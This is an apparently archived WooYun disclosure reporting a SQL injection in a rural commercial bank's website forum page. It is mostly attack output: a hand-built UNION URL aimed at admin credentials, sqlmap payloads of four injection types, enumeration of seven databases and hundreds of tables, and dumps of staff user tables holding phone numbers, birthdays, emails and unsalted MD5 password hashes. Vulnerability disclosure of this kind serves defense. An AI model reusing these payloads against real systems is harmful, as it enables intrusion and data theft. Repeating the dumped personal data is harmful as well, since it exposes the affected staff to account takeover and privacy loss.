当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140554

漏洞标题:济源农商行主站SQL注入漏洞导致大量敏感信息泄露(支持Union&7库500多表)

相关厂商:jynsh.com

漏洞作者: 路人甲

提交时间:2015-09-13 19:33

修复时间:2015-10-30 14:02

公开时间:2015-10-30 14:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

不给20rank,合适吗。

详细说明:

SQL注入漏洞,大量数据库信息泄露...(麻烦管理员有些地方打下马赛克)

漏洞证明:

济源农商行主站存在SQL注入,导致大量数据库敏感信息泄露。(个人感觉你们的网站问题较多..)
SQL注入地址:http://**.**.**.**/bbs/boardrule.php?groupboardid=1(注入参数为groupboardid)
手工构造如下URL提交测试:http://**.**.**.**/bbs/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/admin/index.php
系统报错如下,感觉存在SQL注入。

SQL报错.png


二话不说,扔到SQLMAP跑一下,果然存在

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
current database:    'jynshcom'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: groupboardid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: groupboardid=1 RLIKE (SELECT (CASE WHEN (9944=9944) THEN 1 ELSE 0x28 END))
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: groupboardid=1 AND (SELECT 5588 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(5588=5588,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: groupboardid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))mIJu)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: groupboardid=1 UNION ALL SELECT CONCAT(0x71706a7071,0x415549714f4577426570,0x71707a7071)-- 
---


一共包含7个数据库

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
available databases [7]:
[*] information_schema
[*] jynshcom
[*] mysql
[*] newbank
[*] test
[*] xznsyh
[*] ydbg


当前数据库为jynshcom,139个表

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: jynshcom
[139 tables]
+---------------------------+
| adl_content               |
| adl_modu_auth             |
| article                   |
| articleclass              |
| auth_role                 |
| chatmessage               |
| chatsession               |
| chatuserlist              |
| counter                   |
| counter_authitem          |
| counter_browsecap         |
| counter_ipaddr            |
| customer                  |
| dayduty                   |
| department                |
| doc_qs                    |
| dutygroup                 |
| dv_active                 |
| dv_activeuser             |
| dv_admin                  |
| dv_argue                  |
| dv_argue_topic            |
| dv_banklog                |
| dv_bankstatus             |
| dv_bbs1                   |
| dv_bbs_ft                 |
| dv_bbslink                |
| dv_bbsnews                |
| dv_besttopic              |
| dv_board                  |
| dv_boardpermission        |
| dv_bookmark               |
| dv_chanorders             |
| dv_friend                 |
| dv_fsettings              |
| dv_gather_info            |
| dv_gather_url             |
| dv_group_bbs1             |
| dv_group_board            |
| dv_group_name             |
| dv_group_topic            |
| dv_group_user             |
| dv_groupname              |
| dv_help                   |
| dv_honor_list             |
| dv_honor_user             |
| dv_log                    |
| dv_message                |
| dv_moneylog               |
| dv_note_info              |
| dv_online                 |
| dv_plus                   |
| dv_plus_tools_buss        |
| dv_plus_tools_info        |
| dv_plus_tools_magicface   |
| dv_querycache             |
| dv_savvy_integral         |
| dv_savvy_topic            |
| dv_savvy_wealth           |
| dv_setup                  |
| dv_smallpaper             |
| dv_space_apply_today_star |
| dv_space_keyword          |
| dv_space_post             |
| dv_space_skins            |
| dv_space_syscat           |
| dv_space_system           |
| dv_space_topic            |
| dv_space_upfile           |
| dv_space_user             |
| dv_space_usercat          |
| dv_space_usersave         |
| dv_styles                 |
| dv_sysfiles               |
| dv_sysupgrade             |
| dv_tablelist              |
| dv_topic                  |
| dv_topic_ft               |
| dv_upfile                 |
| dv_user                   |
| dv_useraccess             |
| dv_usergroups             |
| dv_vote                   |
| dv_voteuser               |
| email                     |
| file                      |
| flink_main                |
| ipjilu                    |
| ipname                    |
| mailinfo                  |
| mailiplog                 |
| menu                      |
| menu_deleted              |
| menu_role                 |
| message                   |
| modu                      |
| news_manage_modu_attach   |
| news_manage_modu_auth     |
| news_manage_modu_class    |
| news_manage_modu_content  |
| online_vod_modu_attach    |
| online_vod_modu_auth      |
| online_vod_modu_class     |
| online_vod_modu_content   |
| pop_modu_auth             |
| pos_apply                 |
| pos_handle                |
| pos_img                   |
| public_information        |
| qsh                       |
| roles                     |
| skin                      |
| soft                      |
| softtype                  |
| tmp                       |
| tmp1                      |
| tsjy_sl                   |
| tsjy_xx                   |
| user_dep                  |
| user_modu_auth            |
| users                     |
| users_deleted             |
| users_roles               |
| users_type                |
| vote_answer               |
| vote_modu_auth            |
| vote_question             |
| xedk_exp_date             |
| xedk_jtcy                 |
| xedk_sl                   |
| xedk_sq                   |
| xedk_user                 |
| xedk_xx                   |
| xedk_zh                   |
| xedk_zh2                  |
| xxgk                      |
| youqinglj                 |
| zhaopin_date              |
| zhaopinxx                 |
+---------------------------+


管理员表dv_admin

Database: jynshcom
Table: dv_admin
[11 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| acceptip    | varchar(255)     |
| adduser     | varchar(50)      |
| errcount    | smallint(6)      |
| flag        | text             |
| id          | int(11) unsigned |
| lastlogin   | int(10) unsigned |
| lastloginip | varchar(20)      |
| mysession   | varchar(20)      |
| password    | varchar(32)      |
| sessioncode | varchar(6)       |
| username    | varchar(50)      |
+-------------+------------------+


看一下jynshcom数据库的user表

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: jynshcom
Table: users
[29 entries]
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| id | type_id | duty                  | name                | phone       | email          | remark  | deption | wxphone | nxphone | username         | birthday   | PBCaller | password                         | confirmed | admin_role | confirm_man | latest_access_ip | latest_access_time  |
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| 1  | 1       | ?\xed????\xb7????\xb1 | ???????\xed?\xb1    | 13523528780 | <blank>        | <blank> | <blank> | <blank> | <blank> | administ         | 1983-06-29 | <blank>  | 7b33aa4221db6596a367b0072c4943ee | 1         | 1          | administ    | **.**.**.**    | 2015-09-06 16:08:29 |
| 2  | 1       | <blank>               | ???????\xa7         | <blank>     | <blank>        | <blank> | <blank> | <blank> | <blank> | anonymous        | 0000-00-00 | <blank>  | 665dbdbbf44d88679510e0fe3c56b511 | 1         | <blank>    | administ    | **.**.**.**     | 2013-01-28 14:49:49 |
| 3  | 1       | <blank>               | ??????              | <blank>     | jynsh@**.**.**.**  | <blank> | <blank> | <blank> | <blank> | xindaibu         | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | <blank>    | administ    | **.**.**.**    | 2013-01-05 07:56:59 |
| 4  | 1       | <blank>               | ?\xe1????           | <blank>     | jynsh@**.**.**.**  | <blank> | <blank> | <blank> | <blank> | kuaijibu         | 0000-00-00 | <blank>  | ba0de49719930222d2347470153df6e7 | 1         | <blank>    | administ    | **.**.**.**    | 2013-01-28 14:58:55 |
| 5  | 1       | <blank>               | \xd7???????????     | <blank>     | jynsh2@**.**.**.** | <blank> | <blank> | <blank> | <blank> | piaojubu         | 0000-00-00 | <blank>  | 665dbdbbf44d88679510e0fe3c56b511 | 1         | <blank>    | administ    | **.**.**.**     | 2012-06-29 10:34:50 |
| 6  | 1       | <blank>               | ????????            | <blank>     | jynsh3@**.**.**.** | <blank> | <blank> | <blank> | <blank> | qingsuanzhongxin | 0000-00-00 | <blank>  | 665dbdbbf44d88679510e0fe3c56b511 | 1         | <blank>    | administ    | **.**.**.**    | 2012-06-29 10:40:53 |
| 7  | 1       | <blank>               | ??\xd7???????       | <blank>     | jynsh4@**.**.**.** | <blank> | <blank> | <blank> | <blank> | dianziyinhangbu  | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | <blank>    | administ    | **.**.**.**    | 2015-06-18 17:58:10 |
| 8  | 1       | <blank>               | \xb0\xec????        | <blank>     | jynsh5@**.**.**.** | <blank> | <blank> | <blank> | <blank> | bangongshi       | 0000-00-00 | <blank>  | 665dbdbbf44d88679510e0fe3c56b511 | 1         | <blank>    | administ    | **.**.**.**    | 2014-04-21 17:31:40 |
| 9  | 1       | <blank>               | ?????\xa4\xd7\xf7?? | <blank>     | dqb@**.**.**.**    | <blank> | <blank> | <blank> | <blank> | dqb              | 0000-00-00 | <blank>  | d199732f04302c89ebfde37149c32072 | 1         | <blank>    | administ    | **.**.**.**    | 2013-08-08 15:09:59 |
| 10 | 1       | <blank>               | lv                  | <blank>     | hsga@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jjjcb            | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 1          | administ    | **.**.**.**    | 2012-09-03 17:34:51 |
| 13 | 1       | <blank>               | ??????              | <blank>     | jynx01@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh01          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**    | 2015-09-06 17:38:48 |
| 12 | 1       | <blank>               | ?????\xa7??         | <blank>     | jynx02@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh02          | 0000-00-00 | <blank>  | 5fd90d808cc69dcb3b9484f62711c3fc | 1         | <blank>    | administ    | **.**.**.**   | 2015-09-10 17:40:07 |
| 14 | 1       | <blank>               | \xb1\xb1??          | <blank>     | jynx03@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh03          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**    | 2015-08-27 11:54:45 |
| 15 | 1       | <blank>               | ?\xec??             | <blank>     | jynx04@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh04          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**    | 2015-08-27 11:54:58 |
| 16 | 1       | <blank>               | ???\xb0             | <blank>     | jynx05@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh05          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2014-06-27 17:01:02 |
| 17 | 1       | <blank>               | ????                | <blank>     | jynx06@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh06          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2013-07-02 08:24:28 |
| 18 | 1       | <blank>               | ????                | <blank>     | jynx07@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh07          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2014-01-07 09:38:16 |
| 19 | 1       | <blank>               | \xe9\xf2??          | <blank>     | jynx08@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh08          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**    | 2013-06-04 16:53:00 |
| 20 | 1       | <blank>               | ???\xfa??           | <blank>     | jynx09@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh09          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2015-06-15 10:34:45 |
| 21 | 1       | <blank>               | ????                | <blank>     | jynx10@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh10          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2014-05-15 09:34:45 |
| 22 | 1       | <blank>               | ????                | <blank>     | jynx11@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh11          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2013-06-24 07:58:55 |
| 23 | 1       | <blank>               | ????                | <blank>     | jynx12@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh12          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2013-06-26 16:21:23 |
| 24 | 1       | <blank>               | ?\xf3??             | <blank>     | jynx13@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh13          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2014-01-09 10:22:35 |
| 25 | 1       | <blank>               | ????                | <blank>     | jynx19@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh19          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2013-07-26 09:20:32 |
| 26 | 1       | <blank>               | ????                | <blank>     | jynx14@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh14          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2013-08-05 14:31:42 |
| 27 | 1       | <blank>               | ????                | <blank>     | jynx18@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh18          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2015-04-07 09:38:06 |
| 28 | 1       | <blank>               | ???\xb1             | <blank>     | jynx15@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh15          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2014-04-14 08:34:26 |
| 29 | 1       | <blank>               | ????                | <blank>     | jynx16@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh16          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**   | 2015-01-29 14:17:14 |
| 30 | 1       | <blank>               | ???\xb7             | <blank>     | jynx17@**.**.**.** | <blank> | <blank> | <blank> | <blank> | jynsh17          | 0000-00-00 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 0          | administ    | **.**.**.**  | 2013-07-29 18:03:57 |
+----+---------+-----------------------+---------------------+-------------+----------------+---------+---------+---------+---------+------------------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+


newbank包含102个表,该表应该包含用户银行账户信息,就不拖库了。

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: newbank
[102 tables]
+--------------------------------+
| c_courtjudgment                |
| c_courtlawsuitcpt              |
| c_courtrefereeinfo             |
| c_gschangeinfo                 |
| comp_receivables               |
| corp_control                   |
| corp_glc                       |
| corp_qygd                      |
| cr_annex                       |
| cr_corp_inf                    |
| cr_family                      |
| cr_farm                        |
| cr_goods                       |
| cr_jtsz                        |
| cr_per_car                     |
| cr_per_house                   |
| cr_per_loan                    |
| cr_pers_inv                    |
| cr_pers_prod                   |
| cr_personinfo                  |
| cr_zc                          |
| crm_contactlog                 |
| crm_customerinfo               |
| crm_history                    |
| crm_hmd                        |
| errormsginfo                   |
| hpbaseelement                  |
| hpbaselayout                   |
| hpelement                      |
| hpextelement                   |
| hpfieldelement                 |
| hpinfo                         |
| hpsqlelement                   |
| hpstyle                        |
| hpwhereelement                 |
| hrmcity                        |
| hrmcompany                     |
| hrmcountry                     |
| hrmdepartment                  |
| hrmpassword                    |
| hrmperformancealert            |
| hrmperformancealertcheck       |
| hrmperformanceappendrule       |
| hrmperformanceappendruletarget |
| hrmperformancebeforepoint      |
| hrmperformancecheckdetail      |
| hrmperformancecheckflow        |
| hrmperformancecheckpoint       |
| hrmperformancecheckpointdetail |
| hrmperformancecheckrule        |
| hrmperformancecheckscheme      |
| hrmperformancecheckstd         |
| hrmperformancecustom           |
| hrmperformancediycheckpoint    |
| hrmperformanceflow             |
| hrmperformancegoal             |
| hrmperformancegoalshare        |
| hrmperformancegoalstd          |
| hrmperformancegrade            |
| hrmperformancegradedetail      |
| hrmperformancenodepoint        |
| hrmperformanceplancheck        |
| hrmperformanceplandown         |
| hrmperformanceplaneffort       |
| hrmperformanceplaneffortmodul  |
| hrmperformanceplankey          |
| hrmperformanceplankeymodul     |
| hrmperformanceplankind         |
| hrmperformanceplankinddetail   |
| hrmperformanceplanmodul        |
| hrmperformancepointadjust      |
| hrmperformancepointrule        |
| hrmperformancereport           |
| hrmperformancereportlog        |
| hrmperformanceschemecontent    |
| hrmperformanceschemedetail     |
| hrmperformanceschemepercent    |
| hrmperformancetargetdetail     |
| hrmperformancetargetstd        |
| hrmperformancetargettype       |
| hrmprovince                    |
| hrmresource                    |
| hrmresourcemanager             |
| hrmsubcompany                  |
| htmllabelinfo                  |
| htmlnoteinfo                   |
| imagefile                      |
| license                        |
| mailsendmain                   |
| mailsendrecord                 |
| sms                            |
| sysmaintenancelog              |
| syspoppupinfo                  |
| syspoppupremindinfonew         |
| syspopremindinfo               |
| system_skin                    |
| systemset                      |
| voting                         |
| workflow_currentoperator       |
| workflow_requestbase           |
| workplan                       |
| workplanupdate                 |
+--------------------------------+


ydbg包含87表

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: ydbg
[87 tables]
+-----------------------------+
| dhmi_config                 |
| ema_license_log             |
| mdp_extention               |
| mdp_logs                    |
| mip_adminmailconfig         |
| mip_app_config              |
| mip_app_period              |
| mip_app_sections            |
| mip_batchcert_info          |
| mip_branch                  |
| mip_business_admin          |
| mip_business_area           |
| mip_business_data           |
| mip_cert_info               |
| mip_client_app              |
| mip_config                  |
| mip_custom_catalog          |
| mip_custom_sysuser          |
| mip_domain                  |
| mip_domain_app              |
| mip_domain_statistics       |
| mip_dps_config              |
| mip_dpsnotsupport_file      |
| mip_enterprise_gateway      |
| mip_enterpriseadmin         |
| mip_enterpriseconfig        |
| mip_enterprisemailconfig    |
| mip_enterprisemailcontrol   |
| mip_extendcode              |
| mip_file_type               |
| mip_group                   |
| mip_group_contact           |
| mip_group_user              |
| mip_keyfilter               |
| mip_ldap                    |
| mip_ldap_reflect            |
| mip_logs                    |
| mip_mail                    |
| mip_mail_logs               |
| mip_mailconfig              |
| mip_map_data                |
| mip_message                 |
| mip_mmsconfig               |
| mip_mmsdata                 |
| mip_mobiletype              |
| mip_packet                  |
| mip_personal_group          |
| mip_personal_user           |
| mip_personal_user_extend    |
| mip_plugin_app              |
| mip_pushrule_blocklist      |
| mip_pushrule_filter         |
| mip_pushrule_time           |
| mip_pushrule_trustlist      |
| mip_relation_custom_catalog |
| mip_role                    |
| mip_role_permission         |
| mip_router                  |
| mip_sections                |
| mip_sms_usagecount          |
| mip_smsconfig               |
| mip_smsdata                 |
| mip_syslog                  |
| mip_system_mornitor         |
| mip_sysuser                 |
| mip_sysuser_extend          |
| mip_upgrade                 |
| mip_upgrade_require         |
| mip_upload_file             |
| mip_user_ctr                |
| mip_user_deviceinfo         |
| mip_user_extention          |
| mip_user_login              |
| mip_user_mobiletype         |
| mip_user_phoneinfo          |
| mip_user_privacy            |
| mip_user_pushrule           |
| mip_user_role               |
| mip_user_statistics         |
| mip_userofapp               |
| mip_useronline_statistic    |
| mip_visit_log               |
| mip_wapconfig               |
| mip_wappushurl              |
| mip_white_black             |
| mip_whitelist               |
| mip_whitelist_config        |
+-----------------------------+


xznsyh包含130个表

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: xznsyh
[130 tables]
+---------------------------+
| adl_content               |
| adl_modu_auth             |
| article                   |
| articleclass              |
| auth_role                 |
| chatmessage               |
| chatsession               |
| chatuserlist              |
| counter                   |
| counter_authitem          |
| counter_browsecap         |
| counter_ipaddr            |
| customer                  |
| dayduty                   |
| doc_qs                    |
| dutygroup                 |
| dv_active                 |
| dv_activeuser             |
| dv_admin                  |
| dv_argue                  |
| dv_argue_topic            |
| dv_banklog                |
| dv_bankstatus             |
| dv_bbs1                   |
| dv_bbs_ft                 |
| dv_bbslink                |
| dv_bbsnews                |
| dv_besttopic              |
| dv_board                  |
| dv_boardpermission        |
| dv_bookmark               |
| dv_chanorders             |
| dv_friend                 |
| dv_fsettings              |
| dv_gather_info            |
| dv_gather_url             |
| dv_group_bbs1             |
| dv_group_board            |
| dv_group_name             |
| dv_group_topic            |
| dv_group_user             |
| dv_groupname              |
| dv_help                   |
| dv_honor_list             |
| dv_honor_user             |
| dv_log                    |
| dv_message                |
| dv_moneylog               |
| dv_note_info              |
| dv_online                 |
| dv_plus                   |
| dv_plus_tools_buss        |
| dv_plus_tools_info        |
| dv_plus_tools_magicface   |
| dv_querycache             |
| dv_savvy_integral         |
| dv_savvy_topic            |
| dv_savvy_wealth           |
| dv_setup                  |
| dv_smallpaper             |
| dv_space_apply_today_star |
| dv_space_keyword          |
| dv_space_post             |
| dv_space_skins            |
| dv_space_syscat           |
| dv_space_system           |
| dv_space_topic            |
| dv_space_upfile           |
| dv_space_user             |
| dv_space_usercat          |
| dv_space_usersave         |
| dv_styles                 |
| dv_sysfiles               |
| dv_sysupgrade             |
| dv_tablelist              |
| dv_topic                  |
| dv_topic_ft               |
| dv_upfile                 |
| dv_user                   |
| dv_useraccess             |
| dv_usergroups             |
| dv_vote                   |
| dv_voteuser               |
| email                     |
| file                      |
| flink_main                |
| ipname                    |
| menu                      |
| menu_deleted              |
| menu_role                 |
| message                   |
| modu                      |
| news_manage_modu_attach   |
| news_manage_modu_auth     |
| news_manage_modu_class    |
| news_manage_modu_content  |
| online_vod_modu_attach    |
| online_vod_modu_auth      |
| online_vod_modu_class     |
| online_vod_modu_content   |
| pop_modu_auth             |
| public_information        |
| roles                     |
| skin                      |
| soft                      |
| softtype                  |
| tmp                       |
| tmp1                      |
| tsjy_sl                   |
| tsjy_xx                   |
| user_modu_auth            |
| users                     |
| users_deleted             |
| users_roles               |
| users_type                |
| vote_answer               |
| vote_modu_auth            |
| vote_question             |
| xedk_exp_date             |
| xedk_jtcy                 |
| xedk_sl                   |
| xedk_sq                   |
| xedk_user                 |
| xedk_xx                   |
| xedk_zh                   |
| xedk_zh2                  |
| xxgk                      |
| youqinglj                 |
| zhaopin_date              |
| zhaopinxx                 |
+---------------------------+


随便看一下xznsyh的users表

web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
Database: xznsyh
Table: users
[5 entries]
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| id | type_id | duty         | name       | phone       | email             | remark  | deption | wxphone | nxphone | username  | birthday   | PBCaller | password                         | confirmed | admin_role | confirm_man | latest_access_ip | latest_access_time  |
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+
| 1  | 1       | ?í????·????± | ???????í?± | 13523528780 | <blank>           | <blank> | <blank> | <blank> | <blank> | administ  | 1983-06-29 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | 1          | administ    | **.**.**.**    | 2015-09-11 13:48:05 |
| 2  | 1       | <blank>      | ???????§   | <blank>     | <blank>           | <blank> | <blank> | <blank> | <blank> | anonymous | 0000-00-00 | <blank>  | 665dbdbbf44d88679510e0fe3c56b511 | 1         | <blank>    | administ    | **.**.**.**     | 2013-01-28 14:49:49 |
| 4  | 1       | <blank>      | ?????±     | <blank>     | xzls666@**.**.**.**   | <blank> | <blank> | <blank> | <blank> | xzls666   | 0000-00-00 | <blank>  | d05a8e6dd0c789c99861117bd71ba71e | 1         | 1          | administ    | **.**.**.**    | 2015-05-12 15:12:01 |
| 5  | 1       | <blank>      | ?????????? | <blank>     | grywb@vip.**.**.**.** | <blank> | <blank> | <blank> | <blank> | grywb     | 1980-02-29 | <blank>  | e10adc3949ba59abbe56e057f20f883e | 1         | <blank>    | administ    | **.**.**.**   | 2015-08-27 16:19:11 |
| 3  | 1       | <blank>      | ×??????í?? | <blank>     | [email protected]     | <blank> | <blank> | <blank> | <blank> | zhglb     | 0000-00-00 | <blank>  | 8cd3fd02db1667e7d6a66ab9a01f6e5e | 1         | <blank>    | zhglb       | **.**.**.**    | 2015-06-18 18:05:57 |
+----+---------+--------------+------------+-------------+-------------------+---------+---------+---------+---------+-----------+------------+----------+----------------------------------+-----------+------------+-------------+------------------+---------------------+


OK,我只想说,我不拖库,不给20rank合适吗

修复方案:

你们是专家。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-15 14:00

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无